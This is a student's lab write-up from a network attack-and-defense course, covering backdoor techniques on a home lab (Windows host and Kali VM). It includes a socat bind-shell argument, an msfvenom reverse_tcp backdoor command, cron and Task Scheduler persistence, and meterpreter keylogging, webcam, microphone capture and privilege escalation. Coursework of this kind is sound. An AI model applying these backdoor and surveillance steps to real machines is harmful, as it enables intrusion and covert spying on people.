20145227《网络对抗》后门原理与实践

20145227《网络对抗》后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 在进行网页浏览时,一些点击到的广告可能就会植入后门。
  • 去网上下载安装软件时,会有捆绑的软件进行安装。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 开机就自动启动;篡改注册表;将后门伪装成普通程序使用户自己启动;通过cron启动等。

(3)Meterpreter有哪些给你映像深刻的功能?

  • 可以获取摄像头和击键内容让我印象很深刻。这些功能让自己感觉随时被监视着。

(4)如何发现自己有系统有没有被安装后门?

  • 可以通过杀毒软件或者监控软件来检测。

实践过程记录

常用后门工具

  • Netcat又名nc,ncat,只要甲主机打开了端口(任何对外服务的端口),乙主机就可以使用nc命令连接这个端口。两台主机可以进行数据交换。
  • Meterpreter:msfenom命令可生成后门可执行文件。

常用后门工具实践

Windows获得Linux Shell

  • 先查询windows下主机IP地址:10.43.53.27,虚拟机IP地址:192.168.50.130 。并检查主机和虚拟机能否ping通。

  • 使用ncat.exe程序监听本机的5227端口。

  • 在Kali环境下,反向连接Windows主机的5227端口

  • 此时Windows主机下成功获得了一个Kali的shell,运行ls指令如下

Linux获得Windows Shell

  • 在Kali环境下用ifconfig查看IP,然后监听5227端口

  • 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5227端口

  • Kali下可以看到Windows的命令提示,可以输入Windows命令

使用nc传输数据

  • 建立连接之后,主机和虚拟机就可以传输数据了,传输的是字符串,相当于两台主机在聊天。

使用netcat获取主机操作Shell,cron启动 (1分)

  • 先在Windows系统下,监听5227端口

  • 在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。

  • crontab -e指令编辑一条定时任务。然后最后一行修改时间为38 。当时间到了38分时,此时已经获得了Kali的shell,可以输入指令如ls等。

使用socat获取主机操作Shell, 任务计划启动 (1分)

  • socat是ncat的增强版,它的基本功能就是建立两个双向的字节流,数据就在其间传输。
  • 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5227 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5227 。

  • 创建完成之后,再次打开计算机时,可以发现之前创建的任务已经开始运行

  • 在Kali环境下输入指令socat - tcp:10.43.53.27:5227,此时可以发现已经成功获得了一个cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

  • 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.130 LPORT=5227 -f exe > 20145227_backdoor.exe生成后门程序

  • 通过nc指令将生成的后门程序传送到Windows主机上

  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

  • 设置完成后,执行监听

  • 打开Windows上的后门程序,此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

  • 使用record_mic指令可以截获一段音频

  • 使用webcam_snap指令可以使用摄像头进行拍照,使用webcam_stream指令可以使用摄像头进行录像。由于没有给虚拟机添加相应的硬件,所以没能打开摄像头。

  • 使用screenshot指令可以进行截屏

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

  • 使用getuid指令查看当前用户;使用getsystem指令进行提权

实验总结与体会

  • 这次实验之后,我对网络安全的问题有了更深的体会。实验通过这么简单的方法,就能够对自己的电脑进行监控,获取到很多信息,那么如果有人恶意想要盗取你的信息或者对你进行监控的话,你很可能时时刻刻会处于一个“透明”的状态。在当今社会,处处离不开网络,因此我们要时时刻刻提高安全防范意识,定期检查自己的电脑,防止别人恶意盗取利用自己的信息。希望可以将自己学到的知识与实践相结合,帮助别人解决更多的问题。
posted @ 2017-03-17 22:11  20145227鄢曼君  阅读(244)  评论(0编辑  收藏  举报